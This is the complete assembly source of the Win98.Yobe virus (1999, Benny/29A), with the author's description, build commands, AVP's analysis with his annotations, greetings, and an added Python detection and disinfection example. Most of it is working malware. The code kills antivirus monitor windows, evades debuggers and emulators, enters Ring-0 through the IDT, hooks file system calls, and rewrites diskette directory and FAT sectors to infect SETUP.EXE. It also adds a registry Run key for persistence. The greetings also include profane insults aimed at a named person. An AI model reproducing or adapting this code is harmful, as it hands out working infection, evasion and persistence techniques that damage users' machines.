;----------------------------------------------------------------[yobe.asm]---
;
;          Win98.Yobe.24576
;          by Benny/29A
;
;
;
;Author's description
;---------------------
;
;Hey reader! R u st0ned or drunk enough? If not, then don't read this, coz this
;is really crazy. Let me introduce u the FIRST FAT12 infector (also called a
;cluster/directory virus), fully compatible with windozes (Win98)!
;No no, that's not enough. This is also resident, multithreaded in both
;Ring-0 and Ring-3 levels with anti-debugging, anti-heuristic, anti-emulator and
;anti-monitor features, using the Win9X backdoor to call DOS services and working
;with CRC32, the Windows registry and API functions.
;Among all these features, I don't hope it has any chance to spread outta
;world. It infects only diskettes (A: only) and only one file - SETUP.EXE. More
;crazy than u thought, nah? Yeah, I'm lazy so I didn't want to test my code on
;my harddisk and I also didn't want to think about infection of more than one
;file. When I finished Win98.BeGemot, I was totally b0red of those stupid PE
;headerz, RVAs and such like. I wanted to code something really original, not
;the next average-b0ring virus. I hope I succeeded. This virus doesn't demonstrate
;only porting old techniques (c Dir-II virus) to a new environment, but also
;hot-new techniques (e.g. Ring0 threads). For this virus to be really heavily
;armoured it is missing some poly/meta engine. Unfortunately, this conception of
;virus doesn't allow me to implement such engines (nor compression), coz
;I can't modify virus code. However, I included many useful trix to fool
;debuggerz as well as heuristic scannerz. Bad thing is that this babe is
;detectable by NODICE32 - NODICE32 can find suspicious code (such as modifying
;IDT) and so it immediately reports an unknown virus. There ain't chance to
;improve it, coz I can't use any kind of encryption. Fortunately, other AVs
;find sh!t :D. I hope u will like this piece of work (it took me much time to
;code it, albeit it is very small (code is small, headerz r huge :) and
;optimized) and u will learn much from that. U will probably ask me, why I didn't
;code a stealth virus. U r right, it's easy to implement a full-stealth mechanism,
;but, but, ... I won't lie to u - I'm lazy :).
;Gimme know, if u will have any comments, if u will find any bugs or anything
;else...thnx.
;
;
;
;What will happen on execution ?
;-------------------------------
;
;Virus will:
;1)	Set up SEH frame
;2)	Check for CRC32 of virus body
;3)	Check for application level debugger
;4)	Reset SEH frame and run anti-heuristic code
;5)	Kill some AV monitors (AVP, AMON) + some anti-heuristic code
;6)	Check for SoftICE
;7)	Copy virus to internal buffer, create new Ring-3 thread and wait for
;	its termination
;8)	-	Jump to Ring-0 (via IDT)
;9)	-	Check for residency and install itself to memory
;10)	-	Quit from Ring-0
;11)	Restore host
;12)	Execute host
;13)	Restore host, so host will be infected again
;14)	Set registry key, so virus will be executed every time Windows
;	starts
;15)	Check for payload activation time
;16)	-	Do payload
;17)	Remove SEH frame and quit
;
;
;Virus in memory will:
;1)	Check file name
;2)	Create new Ring-0 thread and wait for its termination
;3)	-	Check for drive parameters (BOOT sector check)
;4)	-	Check for free space (FAT check)
;5)	-	Redirect cluster_ptr in directory structure (ROOT)
;6)	-	Write virus to the end of DATA area
;7)	-	Save back FAT, ROOT and SAVE area (internally used by virus)
;8)	-	Terminate Ring-0 thread
;9)	Pass control to next IFS hooker
;
;
;
;Payload
;--------
;
;With probability 1:255, virus will show icon on the left side of the screen and
;will rotate with it. U will c, how light-snake will be rolled on the screen.
;User will be really impressed! X-D I still can't stop watching it, it really
;hypnotized me ! :DDDDD.
;
;
;
;Known bugs
;-----------
;
;My computer will sometimes hang while system tries to read infected file.
;Maybe old FD drive, maybe some bugz in virus code. This appears only on my
;computer, so I hope it is error on my side.
;
;
;
;AVP's description
;------------------
;
;Benny's notes: This is much better description than at BeGemot virus. However,
;I have some notes, see the [* *] marks:
;
;
;Win95.Yobe [* Fully compatible with Win98, so why Win95? *]
;
;This is a dangerous [* why dangerous?! *] memory resident parasitic Windows
;virus. It uses system calls that are valid under Win95/98 only and can't spread
;under NT. The virus also has bugs and often halts the system when run [* when,
;where, why? *]. Despite this the virus has a very unusual way of spreading,
;and it is interesting enough from a technical point of view [* I hope it is *].
;The virus can be found only in two files: "SETUP.EXE" on floppy disks and
;"SETUP .EXE" in the root of the C: drive (there is one space between file name
;and ".EXE" extension).
;
;On the floppy disks the virus uses a trick to hide its copy. It writes its
;complete code to the last disk sectors and modifies the SETUP.EXE file to read
;and execute this code.
;
;The infected SETUP.EXE file looks just as 512 bytes DOS EXE program, but it is
;not. While infecting this file the virus uses "DirII" virus method: by direct
;disk sectors read/write calls the virus gets access to disk directory sectors,
;modifies "first file cluster" field and makes necessary changes in disk FAT
;tables. As a result the original SETUP.EXE code is not modified, but the
;directory entry points to virus code instead of original file clusters. 
;
;When the infected SETUP.EXE is run from the affected floppy disk this DOS
;component of the virus takes control, reads the complete virus body from the
;last sectors on the floppy disk, then creates the "C:\SETUP .EXE" file, writes
;this data (complete virus code) there and executes it. The virus installation
;routine then takes control, installs the virus into the system and disinfects
;the SETUP.EXE file on the floppy drive.
;
;While installing itself into the system the virus creates [* opens *] the new
;key in the system registry to activate itself on each Windows restart: 
;
; HKLM\Software\Microsoft\Windows\CurrentVersion\Run 
;  YOBE=""C:\SETUP .EXE" YOBE"
;
;The virus then switches to the Windows kernel level (Ring0), allocates a block
;of system memory, copies itself to there and hooks disk file access Windows
;functions (IFS API). This hook intercepts file opening calls and on opening
;the SETUP.EXE file on the A: drive the virus infects it. 
;
;The virus has additional routines. First of them looks for "AVP Monitor" and
;"Amon Antivirus Monitor" windows and closes them; the second one depending on
;random counter displays the line with the words "YOBE" to the left side of the
;screen [* this is usually called as payload :D *].
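;
;The directory redirect and SAVE-sector layout described above, as an added
;detection and recovery example in Python (not part of the Yobe source or AVP's
;text): it checks a 1.44 MB FAT12 image for a SETUP.EXE root entry pointing at
;cluster 2800 with size 512 and restores the saved cluster_ptr/filesize from the
;last sector. Sector and cluster numbers come from the source below; the sample
;image is constructed and carries no virus code, only the directory metadata.

```python
"""Added example, not part of the Yobe source or AVP's text: find the on-disk
signs of the directory-redirect infection on a 1.44 MB FAT12 image and put
SETUP.EXE's original entry back from the SAVE sector. Geometry constants
are the ones the text and the BOOT-sector check in the source describe."""
import struct

SECTOR = 512
TOTAL_SECTORS = 2880
ROOT_SECTOR, ROOT_SECTORS = 19, 14          # root directory: sectors 19..32
DATA_SECTOR = 33                            # cluster 2 lives here
SAVE_SECTOR = TOTAL_SECTORS - 1             # "SAVE area = last sector in disk"
YOBE_CLUSTER, YOBE_SIZE = 2800, 512         # values the infector writes
LOADER_SECTOR = DATA_SECTOR + YOBE_CLUSTER - 2   # 2831, i.e. 2880-49
SETUP_NAME = b"SETUP   EXE"                 # 8.3 name as stored in the root


def is_144mb_fat12(img):
    """The same geometry test the infector runs on the BOOT sector and FAT."""
    bps, spc, reserved = struct.unpack_from("<HBH", img, 0x0B)
    nfats = img[0x10]
    spf = struct.unpack_from("<H", img, 0x16)[0]
    media = img[SECTOR]                     # first byte of the first FAT
    return (bps, spc, reserved, nfats, spf, media) == (512, 1, 1, 2, 9, 0xF0)


def find_root_entry(img, name):
    """Return (byte offset, first cluster, size) of a root entry, or None."""
    start = ROOT_SECTOR * SECTOR
    for off in range(start, start + ROOT_SECTORS * SECTOR, 32):
        entry = img[off:off + 32]
        if entry[0] == 0:                   # end-of-directory marker
            return None
        if entry[:11] == name:
            cluster, size = struct.unpack_from("<HI", entry, 0x1A)
            return off, cluster, size
    return None


def scan(img):
    """List the indicators present; an empty list means nothing was found."""
    findings = []
    if len(img) != TOTAL_SECTORS * SECTOR or not is_144mb_fat12(img):
        return findings
    hit = find_root_entry(img, SETUP_NAME)
    if hit is None or (hit[1], hit[2]) != (YOBE_CLUSTER, YOBE_SIZE):
        return findings
    findings.append("SETUP.EXE entry redirected to cluster 2800, size 512")
    loader = img[LOADER_SECTOR * SECTOR:(LOADER_SECTOR + 1) * SECTOR]
    if loader[:2] == b"MZ":
        findings.append("MZ loader stub present at sector 2831")
    saved_cluster, saved_size = struct.unpack_from("<HI", img, SAVE_SECTOR * SECTOR)
    if 2 <= saved_cluster <= 2848:          # plausible data cluster on 1.44 MB
        findings.append(f"SAVE sector keeps original cluster {saved_cluster}, size {saved_size}")
    return findings


def disinfect(img):
    """Undo the redirect in place the way the virus's own restore code does:
    copy cluster_ptr (word) and filesize (dword) back from the SAVE sector.
    Returns the restored (cluster, size), or None if nothing was changed."""
    if not scan(img):
        return None
    off = find_root_entry(img, SETUP_NAME)[0]
    saved_cluster, saved_size = struct.unpack_from("<HI", img, SAVE_SECTOR * SECTOR)
    if not 2 <= saved_cluster <= 2848:      # SAVE area unusable: leave entry alone
        return None
    struct.pack_into("<HI", img, off + 0x1A, saved_cluster, saved_size)
    return saved_cluster, saved_size


def make_sample_image(infected=True):
    """Constructed fixture: blank 1.44 MB image with a single SETUP.EXE entry.
    With infected=True only the directory entry, SAVE sector and an 'MZ' marker
    are set up as the text describes; no virus code is written."""
    img = bytearray(TOTAL_SECTORS * SECTOR)
    struct.pack_into("<HBHBHHBH", img, 0x0B, 512, 1, 1, 2, 224, 2880, 0xF0, 9)
    img[SECTOR] = img[10 * SECTOR] = 0xF0   # media byte in both FATs
    off = ROOT_SECTOR * SECTOR
    img[off:off + 11] = SETUP_NAME
    img[off + 11] = 0x20                    # archive attribute
    struct.pack_into("<HI", img, off + 0x1A, 5, 40000)   # clean: cluster 5, 40000 bytes
    if infected:
        struct.pack_into("<HI", img, SAVE_SECTOR * SECTOR, 5, 40000)
        struct.pack_into("<HI", img, off + 0x1A, YOBE_CLUSTER, YOBE_SIZE)
        img[LOADER_SECTOR * SECTOR:LOADER_SECTOR * SECTOR + 2] = b"MZ"
    return img


if __name__ == "__main__":
    sample = make_sample_image()
    for line in scan(sample):
        print(line)
    print("restored:", disinfect(sample))
```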
;
;
;
;Greetz
;-------
;
;	B0z0		-	Huh, guy, why don't u stay in VX and write
;				another Padania virus? Just last one ;))
;	Billy Belcebu	-	Come to .cz! :D
;	BitAddict	-	Nice to met ya. Kewl to met old TriDenTer.
;	Darkman		-	Thank u for that wonderful book. It really
;				r0x0r!!!
;	Eddow		-	Would like to meet ya on IRC!
;	GriYo		-	Hey man, just reply me once.
;	Itchi		-	Drink, smoke and fuck again! :) Be back and
;				learn to code, pal!
;	Kaspersky	-	U cocksucker, where did u lose the description
;				of BeGemot?!!
;	Reptile		-	Smoke, smoke, smoke. This virus is really
;				st0ned :D. Btw, still working on macro stuph? ;)
;	StarZer0	-	Bak infectorz aren't problem :D. Now, when I
;				finished FAT12 inf., I will try to code
;				multithreaded .txt infector ;)))
;			-	Fibers r cool, but threads rulez!!!
;	The_Might       -\
;	MidNyte		- >	F0rk me a joint pleeeeeeaaazzzzz! :D
;	Rhape97         -/
;	All-nonsmokerz	-	Why do u drink and drive, when u can smoke
;				and fly? X-DDD
;	W33D		-	Thanx for inspiration, this virus is yourz,
;				hehe :D.
;	iKX stuph	-	Great work, men!!! XiNE#4 r0x0r!	
;
;
;
;How to build
;-------------
;
;brcc32 yobe.rc
;tasm32 -ml -q -m9 yobe.asm
;tlink32 -Tpe -c -x -aa yobe,,, import32,,yobe.res
;pewrsec yobe.exe
;
;
;
;Who is YOBE?
;---------------------------
;
;Many ppl will now laugh at me (hi Darkman!, hi Billy!) :DD. Yobe was a human
;whose role is in the Bible. Nah, don't beat me, I'm not catholic. I only like
;the stories and ppl in the Bible. Yobe was a human who lost his religion. Ehrm,
;let's imagine it as "he stopped believing in what he believed". The story is all
;about that u shouldn't stop believing in what u believe. If u believe in a better
;world, don't stop believing in it and do everything to make it come true, don't
;resign. This ain't only about catholicism, it's about life and utopia.
;But NOW pick up your lazy ass and do anything, anything u think is right,
;otherwise u won't get what u want!
;
;
;
;(c) 1999 Benny/29A. Enjoy!



.386p						;386 protected opcodez
.model flat					;flat model, 32bit offset


include win32api.inc				;include some structures


PC_WRITEABLE    equ     00020000h               ;equates used
PC_USER         equ     00040000h               ;in installation
PR_SHARED       equ     80060000h               ;stage
PC_PRESENT	equ	80000000h
PC_FIXED	equ	00000008h
PD_ZEROINIT	equ	00000001h

IFSMgr_GetHeap	equ     0040000Dh		;used services
IFSMgr_Ring0_FileIO	equ     00400032h
IFSMgr_InstallFileSystemApiHook equ     00400067h
UniToBCSPath	equ	00400041h
VMMCreateThread	equ	00010105h
VMMTerminateThread	equ	00010107h
_VWIN32_CreateRing0Thread	equ	002A0013h
IFSMgr_Ring0_FileIO	equ	00400032h


mem_size        equ     (virus_end-Start+0fffh+24576)/1000h
						;size of virus in memory

VxDCall macro  VxDService              		;macro to call VxDCall
        int     20h
        dd      VxDService
	endm


extrn CreateFileA:PROC				;import APIz used by virus
extrn DeviceIoControl:PROC
extrn ExitProcess:PROC
extrn CloseHandle:PROC
extrn GetModuleFileNameA:PROC
extrn ReadFile:PROC
extrn CreateProcessA:PROC
extrn CopyFileA:PROC
extrn WaitForSingleObject:PROC
extrn DeleteFileA:PROC
extrn CreateThread:PROC
extrn GetCommandLineA:PROC
extrn RegCreateKeyExA:PROC
extrn RegSetValueExA:PROC
extrn RegCloseKey:PROC
extrn LoadIconA:PROC
extrn GetDC:PROC
extrn DrawIcon:PROC
extrn IsDebuggerPresent:PROC
extrn FindWindowA:PROC
extrn PostMessageA:PROC



.data						;data section
	VxDName	db	'\\.\vwin32',0		;vwin32 driver name
	srcFile	db	'a:\setup.exe',0	;virus locations
	dstFile	db	'c:\setup.exe',0	;on disk
	regFile	db	'"C:\SETUP .EXE" '	;in registry
	regVal	db	'YOBE',0
regSize = $-regFile
	subKey	db	'Software\Microsoft\Windows\CurrentVersion\Run',0
	sICE	db	'\\.\SICE',0		;SoftICE driver name
	ShItTyMoNs:                    		;monitors to kill
		db	'AVP Monitor',0
		db	'Amon Antivirus Monitor',0
	lpsiStartInfo	db	64		;used by CreateProcessA
			db	63 dup (?)
	regCont:				;registers passed to API
	regEBX	dd	offset ROOT
	regEDX	dd	19
	regECX	dd	14
	regEAX	dd	?
	regEDI	dd	?
	regESI	dd	?
	regFLGS	dd	?
	tmp	dd	?			;variable requiered by API
	org tmp
	hKey	dd	?			;key to registry
	lppiProcInfo:
	hProcess	dd	?		;handle to new process
	hThread		dd	?		;handle to new thread
	dwProcessID	dd	?		;ID of process
	dwThreadID	dd	?		;ID of thread
	vbuffer	db	24576 dup (?)		;buffer filled with virus file
	org vbuffer
	fname	db	256 dup (?)		;name of virus file
ends						;end of data section


.code						;code section
Start:						;virus body starts here
	@SEH_SetupFrame 		;setup SEH frame
	mov esi, offset _crc_			;start of block
	mov edi, crc_end-_crc_			;size of block
	call CRC32				;check code integrity
	cmp eax, 0DACA92DCh			;CRC32 match?
_crc_=$
	jne r_exit				;no, quit (anti-breakpoint)
	call IsDebuggerPresent			;check if any application level
	test eax, eax				;based debugger is present
	jne exit				;yeah, quit - anti-debugger
	mov [eax], ebx				;cause stack overflow exception
	jmp r_exit				;- anti-emulator
seh_jmp:@SEH_RemoveFrame            		;reset SEH handler
	@SEH_SetupFrame 		;...
	mov eax, cs				;load CS selector
	xor al, al				;only LSB is set under WinNT
	test eax, eax				;is WinNT active
	je r_exit				;yeah, quit
	db	0d6h				;anti-emulator
	mov eax, esp				;save ESP to EAX
	push cs					;save CS to stack
	pop ebx					;get it back to EBX
	cmp esp, eax				;match?
	jne r_exit				;no, quit - anti-emulator

	mov eax, fs:[20h]			;get debugger context
	test eax, eax				;is there any?
	jne exit				;yeah, quit - anti-debugger

	mov esi, offset ShItTyMoNs		;pointer to stringz
        xor edi, edi                            ;to AV monitors
	push 2					;2 monitors
        pop ecx                                 ;...
KiLlMoNs:
	push ecx				;save counter
	push esi				;AV string
	push edi				;NULL
        call FindWindowA			;find window
        test eax, eax                           ;found?
        je next_mon                             ;no, try to kill other monitor
        push edi                                ;now we will send message
        push edi                                ;to AV window to kill itself
        push 12h                                ;veeeeeeery stupid X-DD
	push eax
        call PostMessageA			;bye bye, hahaha
next_mon:
        sub esi, -0ch                           ;next monitor string
	pop ecx					;restore counter
        loop KiLlMoNs                           ;kill another one, if present

	push cs					;store CS
	push offset anti_l			;store offset to code
	retf					;go there - anti-emulator

CRC32:  push ebx                                ;I found this code in Int13h's
        xor ecx, ecx                            ;tutorial about infectin'
        dec ecx                                 ;archives. Int13h found this
        mov edx, ecx                            ;code in Vecna's Inca virus.
NextByteCRC:                                    ;So, thank ya guys...
        xor eax, eax                            ;Ehrm, this is very fast
        xor ebx, ebx                            ;procedure to code CRC32 at
        lodsb                                   ;runtime, no need to use big
        xor al, cl                              ;tables.
	mov cl, ch
	mov ch, dl
	mov dl, dh
	mov dh, 8
NextBitCRC:
	shr bx, 1
	rcr ax, 1
	jnc NoCRC
	xor ax, 08320h
	xor bx, 0edb8h
NoCRC:  dec dh
	jnz NextBitCRC
	xor ecx, eax
	xor edx, ebx
        dec edi
	jne NextByteCRC
	not edx
	not ecx
	pop ebx
	mov eax, edx
	rol eax, 16
	mov ax, cx
	ret

anti_l:	mov edi, offset sICE			;pointer to SoftICE
	call OpenDriver				;try to open its driver
	jne exit				;SICE present, quit - anti-debugger
	
	mov esi, offset fname			;where to store virus filename
	push 256				;size of filename
	push esi				;ptr to filename
	push 400000h				;base address of virus
	call GetModuleFileNameA			;get virus filename
	test eax, eax				;error?
	je exit					;yeah, quit

	xor eax, eax
	push eax
	push eax
	push OPEN_EXISTING
	push eax
	push FILE_SHARE_READ
	inc eax
	ror eax, 1
	push eax
	push esi
	call CreateFileA			;open virus file
	inc eax					;error?
	je exit					;yeah, quit
	dec eax
	xchg eax, esi
	push 0
	push offset tmp
	push 24576				;size of virus file
	push offset vbuffer			;ptr to buffer
	push esi
	call ReadFile				;copy virus file to buffer
	push eax
	push esi
	call CloseHandle			;and close virus file
	pop ecx	
	jecxz exit

	xor eax, eax
	push offset tmp
	push eax
	push eax
	push offset NewThread
	push eax
	push eax         			;create new thread and let virus
	call CreateThread			;code continue there
	test eax, eax				;error?
	je exit					;yeah, quit
	mov word ptr [t_patch], 9090h		;allow execution of code -
	push eax				; - anti-emulator
	call CloseHandle			;close handle of thread
crc_end=$
e_patch:jmp $					;this will be patched by thread
						; - anti-emulator
exit:	call GetCommandLineA			;get command-line
	xchg eax, esi				;to esi
	lodsb					;load byte
	cmp al, '"'				;is it " ? If not, virus filename
	jne regSet				;ain't long one - anti-AVer
lchar:	lodsb					;load next byte
	cmp al, '"'				;is it " ?
	jne lchar				;no, continue
_lchar:	lodsb					;load byte
	cmp al, ' '				;is it space?
	je _lchar				;yeah, continue
	test al, al				;is there any parameter?
	jne regSet				;yeah, virus is loaded from
						;C: drive -> no jump to host

	mov edi, offset VxDName			;pointer to vwin32
	call OpenDriver				;open driver
	je regSet				;if error, quit
	dec eax
	mov [d_handle], eax			;store handle
	mov eax, offset ROOT			;buffer for reading ROOT
	push eax       				;save ptr
	call I25hSimple				;read ROOT
	pop ebp					;get it back
	jc c_exit				;if error, then quit

_f_cmp:	mov esi, ebp				;get ptr to ROOT
	push esi
	lodsd
	test eax, eax				;ZERO?
	pop esi
	je c_exit				;yeah, no more filez, quit

	push 11					;size of filename (8+3)
	pop edi					;to EDI
	call CRC32				;calculate CRC32
	cmp eax, 873F6A26h			;match?
	je _fn_ok				;yeah, try to restore file
	sub ebp, -20h				;no, get next directory record
	jmp _f_cmp				;and try again
_fn_ok:	mov edi, offset save			;load SAVE area sector from disk
	mov [regEBX], edi
	mov [regEDX], 2880-1			;SAVE area = last sector in disk
	mov [regECX], 1				;one sector to read
	call I25h				;read it
	jc c_exit				;if error, then quit

	push word ptr [ebp+1ah]			;store cluster_ptr
	push dword ptr [ebp+1ch]		;store filesize
	push word ptr [edi]			;restore cluster_ptr
	pop word ptr [ebp+1ah]			;...
	push dword ptr [edi+2]			;restore filesize
	pop dword ptr  [ebp+1ch]		;...
	call WriteROOT				;restore directory record
	pop dword ptr [ebp+1ch]			;restore filesize
	pop word ptr [ebp+1ah]			;restore cluster_ptr
	jc c_exit				;if error, then quit

	mov ebx, offset dstFile			;destination path+filename
	push 0
	push ebx
	push offset srcFile			;source path+filename
	call CopyFileA				;copy virus from A: to C: drive
	xchg eax, ecx				;error?
	jecxz err_cpa				;yeah, quit

	xor eax, eax
	push offset lppiProcInfo
	push offset lpsiStartInfo
	push eax
	push eax
	push eax
	push eax
	push eax
	push eax
	push eax
	push ebx
	call CreateProcessA			;execute original file (host)
	xchg eax, ecx				;error?
	jecxz err_cpa				;yeah, quit

	mov ebp, [hProcess]			;get handle of host process
	push -1					;wait for its signalisation
	push ebp				;...
	call WaitForSingleObject		;...
	
	push ebp
	call CloseHandle			;close handle of host process
	push dword ptr [hThread]
	call CloseHandle			;close handle of host thread

err_cpa:call WriteROOT				;restore ROOT
	push ebx
	call DeleteFileA			;and delete host from C: drive

c_exit:	push 12345678h				;get handle of vwin32 driver
d_handle = dword ptr $-4
	call CloseHandle			;and close it

regSet:	push offset tmp
	push offset hKey
	push 0
	push 3
	push 0
	push 0
	push 0
	push offset subKey
	push 80000002h
	call RegCreateKeyExA			;open registry
	test eax, eax
	jne r_exit

	push regSize
	push offset regFile
	push 1
	push 0
	push offset regVal
	mov ebx, dword ptr [hKey]
	push ebx           			;set key - virus will be executed
	call RegSetValueExA			;everytime Windows will start
	push ebx
	call RegCloseKey			;close registry

	dw	310fh				;RDTCS
	cmp al, 'Y'				;1:255 possibility
	jne r_exit				;payload won't be activated

payload:push 0					;payload will be activated
	call GetDC				;get device context of desktop
	xchg eax, ebx				;save HDC to EBX
	push 29ah				;ID of icon
	push 400000h				;base of virus
	call LoadIconA				;load icon
	xor edx, edx				;EDX=0
l_payload:
	pushad					;store all registers
	push eax				;icon handle
	push edx				;Y possition
	push 0					;X possition
	push ebx				;device context handle
	call DrawIcon				;draw icon on desktop
	popad					;restore all registers
	sub edx, -30				;increment Y possition
	loop l_payload				;long payload :)

r_exit:	@SEH_RemoveFrame			;remove SEH frame
	push 0
	call ExitProcess			;and exit

NewThread:
	pushad					;store all registers
t_patch:jmp $					;will be patched - anti-emulator
	call EnterRing0				;jmp to Ring-0
	pushad					;store all registers
	mov eax, dr0				;get debug register
	cmp eax, 'YOBE'				;check if we r already resident
	je quitR0				;yeah, quit

	push 24576
	VxDCall IFSMgr_GetHeap			;alocate memory for our virus
	pop edx					;correct stack
	xchg eax, edi				;get address to EDI
	test edi, edi				;error?
	je quitR0				;yeah, quit

	push edi				;copy virus file to memory
	mov esi, offset vbuffer			;from
	mov ecx, 24576/4			;how many
	rep movsd				;move!
	pop ebp
	
	mov [ebp + 600h+membase-Start], ebp	;save address
	lea eax, [ebp + 600h+NewIFSHandler-Start]
	push eax				;pointer to new handler
	VxDCall IFSMgr_InstallFileSystemApiHook	;install file system hook
	pop edx					;correct stack
	mov [ebp + 600h+OldIFSHandler-Start], eax
	mov eax, 'YOBE'				;mark debug register as "already
	mov dr0, eax				;resident flag" - anti-debugger
quitR0:	mov dword ptr [p_jmp], 90909090h	;patch code - anti-emulator
	popad					;restore all registers
	iretd					;and quit from Ring-0

EnterRing0:                                     ;Ring0 port
        pop eax                                 ;get address
        pushad                                  ;store registers
        sidt fword ptr [esp-2]                  ;load 6byte long IDT address
        popad                                   ;restore registers
        sub edi, -(8*3)                         ;move to int3
        push dword ptr [edi]                    ;save original IDT
        stosw                                   ;modify IDT
        inc edi                                 ;move by 2
        inc edi                                 ;...
        push dword ptr [edi]                    ;save original IDT
        push edi                                ;save pointer
        mov ah, 0eeh                            ;IDT FLAGs
        stosd                                   ;save it
        push ds                                 ;save some selectors
        push es                                 ;...
        int 3                                   ;JuMpToRiNg0!
        pop es                                  ;restore selectors
        pop ds                                  ;...
        pop edi                                 ;restore ptr
        add edi, -4                             ;move with ptr
        pop dword ptr [edi+4]                   ;and restore IDT
        pop dword ptr [edi]                     ;...
p_jmp:  inc eax                                 ;some silly loop to fool
        cdq                                     ;some AVs. Will be overwritten
        jmp p_jmp                               ;with NOPs l8r by int handler
	mov word ptr [e_patch], 9090h		;again, new overwriting of code
	popad					; - anti-emulator
	ret					;restore all registers and quit

OpenDriver:
	xor eax, eax
	push eax
	push 4000000h
	push eax
	push eax
	push eax
	push eax
	push edi
	call CreateFileA			;open driver
	inc eax					;increment handle
	ret					;quit

NewIFSHandler:					;file system handler
	enter 20h, 0				;reserve space in stack
	push dword ptr [ebp+1ch]		;for parameters
	push dword ptr [ebp+18h]
	push dword ptr [ebp+14h]		;store parameters
	push dword ptr [ebp+10h]		;for next handler
	push dword ptr [ebp+0ch]
	push dword ptr [ebp+08h]

	cmp dword ptr [ebp+0ch], 24h		;open?
	jne quitHandler				;no, quit

	pushad					;store all registers
	call gdlta				;get delta offset
gdelta:	db	0b8h				;prefix - anti-disassembler
gdlta:	pop ebx					;and anti-lamer

	xor ecx, ecx				;ECX=0
	mov cl, 1				;ECX=0 or 1
semaphore = byte ptr $-1
	jecxz exitHandler			;semaphore set? then quit
	mov byte ptr [ebx + semaphore - gdelta], 0
						;set semaphore
        lea edi, [ebx + filename - gdelta]	;get filename
	mov al, [ebp+10h]			;get disk no.
	dec al					;is it A: ?
	jne exitHandler				;no, quit
	mov al, 'A'				;add A letter
	stosb					;store it
	mov al, ':'				;add : letter
	stosb					;store it

wegotdrive:
	xor eax, eax
	push eax
	inc ah
	push eax
	mov eax, [ebp+1ch]
	mov eax, [eax+0ch]
	sub eax, -4
	push eax
	push edi
	VxDCall UniToBCSPath			;convert UNICOE filename to ANSI
	sub esp, -10h				;correct shitty stack
	mov byte ptr [edi+eax], 0		;and terminate filename with \0

	mov esi, edi
	dec esi
	dec esi
	xchg eax, edi
	inc edi
	inc edi
	inc edi
	call CRC32				;calculate CRC32 of filename
	cmp eax, 0B4662AD0h			;is it "A:\SETUP.EXE,0" ?
	je setup_exe				;yeah, continue

exitHandler:
	mov byte ptr [ebx + semaphore - gdelta], 1	;set semaphore
	popad						;restore all registers
quitHandler:
	mov eax, 12345678h
OldIFSHandler = dword ptr $-4
	call [eax]				;jump to next handler
	sub esp, -18h				;correct stack
	leave
	ret					;and quit

setup_exe:
	mov ecx, 1000h				;thread stack
	lea ebx, [ebx + Thread_Infect - gdelta]	;address of thread proc
	xor esi, esi				;next crappy parameter
	VxDCall _VWIN32_CreateRing0Thread	;create new Ring-0 thread
	jmp exitHandler				;and quit
						; - anti-everything
	db	0b8h				;prefix - anti-disassembler
Thread_Infect:					;Ring-0 thread proc
	pushad					;store all registers
	jmp ti_next				;jump over
	db	3 dup (?)			;leave code be overwritten
ti_next:call tigdelta				;get delta offset
ti_gdelta	db	0b8h			;next prefix
tigdelta:
	pop ebx
	xor ecx, ecx
	inc ecx
	lea esi, [ebx + BOOT - ti_gdelta]	;read BOOT sector
	call Int25h
	jc exit_thread

	cmp [ebx + BOOT+0bh - ti_gdelta], 01010200h	;check, if diskette is 
	jne exit_thread					;1,44MB, check FAT and
	cmp word ptr [ebx + BOOT+0fh - ti_gdelta], 0200h;ROOT possition
	jne exit_thread
	push 9
	pop ecx
	cmp word ptr [ebx + BOOT+16h - ti_gdelta], cx	;...
	jne exit_thread				;no, its not 1,44MB FD

	lea esi, [ebx + FAT - ti_gdelta]
	inc edx
	call Int25h				;read FAT
	cmp byte ptr [esi], 0f0h		;check if it is 1,44MB
	jne exit_thread				;no, quit


	lea edi, [ebx + FAT+4223 - ti_gdelta]	;check FAT, if last sectors r
	mov ebp, edi				;free
	xor eax, eax
sFAT:	scasd
	jne exit_thread				;no, quit
	loop sFAT

	mov edi, ebp				;now we will mark FAT, last
	inc edi					;sectors will be marked as
	mov eax, 0ff0ff00h			;RESERVED
	push 73					;coz we infect 12bit FAT, we
	pop ecx					;use this loop to mark it so
markFAT:ror eax, 8
	test al, al
	je markFAT
	stosb
	loop markFAT
	mov byte ptr [edi], 0fh			;mark end

	call ROOTinit
	call Int25h				;read ROOT

f_cmp:	mov esi, ebp				;get ptr to ROOT          
	push esi                              
	lodsd                                 
	test eax, eax				;ZERO?
	pop esi                               
	je exit_thread				;yeah, no more filez, quit

	push 11
	pop edi
	call CRC32				;calculate CRC32 of file
	cmp eax, 873F6A26h			;is it SETUP.EXE?
	je fn_ok                                ;yeah, continue
	sub ebp, -20h				;no, process next directory rec.
	jmp f_cmp				;...
fn_ok:	mov ax, [ebp+1ah]			;save cluster_ptr
	mov [ebx + save - ti_gdelta], ax
	mov eax, [ebp+1ch]			;save filesize
	mov [ebx + save+2 - ti_gdelta], eax
	mov word ptr [ebp+1ah], 2800		;new cluster_ptr
	mov dword ptr [ebp+1ch], 512		;new filesize

	xor ecx, ecx
	inc ecx
	lea esi, [ebx + loader - ti_gdelta]
	mov edx, 2880-49
	call Int26h				;write DOS loader

	push 42
	pop ecx
	mov esi, [ebx + membase - ti_gdelta]
	mov edx, 2880-48			;write virus
	call Int26h

	xor ecx, ecx
	inc ecx
	lea esi, [ebx + save - ti_gdelta]
	mov edx, 2880-1
	call Int26h				;write SAVE area

	call ROOTinit
	call Int26h				;write ROOT

	push 9
	pop ecx
	lea esi, [ebx + FAT - ti_gdelta]
	xor edx, edx
	inc edx
	pushad
	call Int26h				;write first FAT
	popad
	sub dl, -9
	call Int26h				;write second FAT

exit_thread:
	popad					;restore all registers
	ret					;and exit


ROOTinit:					;procedure to initialize
	push 14					;registers for reading/writing
	pop ecx					;ROOT
	push 19
	pop edx
	lea esi, [ebx + ROOT - ti_gdelta]
	mov ebp, esi
	ret

Int26h: mov eax, 0DE00h				;write sectors
	jmp irfio	
Int25h:	mov eax, 0DD00h				;read sectors
irfio:	VxDCall IFSMgr_Ring0_FileIO
	ret

WriteROOT:					;code used to write sectorz
	mov [regEBX], offset ROOT		;pointer to ROOT field
	mov [regEDX], 19			;sector number of ROOT
	mov [regECX], 14			;sectors to write
I26h:	mov [p2526], 3				;set WRITE mode
	jmp i2526				;continue
I25h:	mov [p2526], 2				;set READ mode
i2526:	and [regEAX], 0				;zero EAX
I25hSimple:
	push 0
	push offset tmp
	push 28
	push offset regCont
	push 28
	push offset regCont
	push 2
p2526 = byte ptr $-1
	push dword ptr [d_handle]
